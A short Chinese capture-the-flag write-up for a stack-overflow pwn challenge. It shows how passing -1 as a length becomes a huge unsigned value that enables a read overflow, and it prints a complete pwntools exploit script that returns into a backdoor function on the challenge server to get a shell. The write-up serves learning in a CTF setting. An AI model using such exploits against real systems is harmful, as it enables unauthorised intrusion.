首先checksec检查一下保护机制:
-64位程序
-开启了栈不可执行保护
接下来使用反汇编工具IDA进行分析:
发现read函数可触发栈溢出,并且从左边发现存在后门函数,但是read读取的长度受到nbytes这个变量的限制,发现这个变量的数据类型在下面被转化为unsigned int即无符号整数类型,当我们将-1转化为unsigned int类型时,会变成unsigned int的最大值,所以在上面我们只需要输入-1即可在下面触发栈溢出,这里顺便算出偏移量为:0x10+0x8 = 24
backdoor函数内部:
拿到backdoor函数地址:0x400726
然后编写exp攻击脚本:
from pwn import * context(arch='amd64', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',28893) # 与在线环境交互。 backdoor = 0x400726 offset = 0x10 + 0x8 io.recvuntil(b'[+]Please input the length of your name:\n') io.sendline(b'-1') io.recvuntil(b'[+]What\'s u name?\n') payload = b'a'*offset + p64(backdoor) io.sendline(payload) io.interactive()这是运行结果:
拿到shell后手动输入cat flag即可
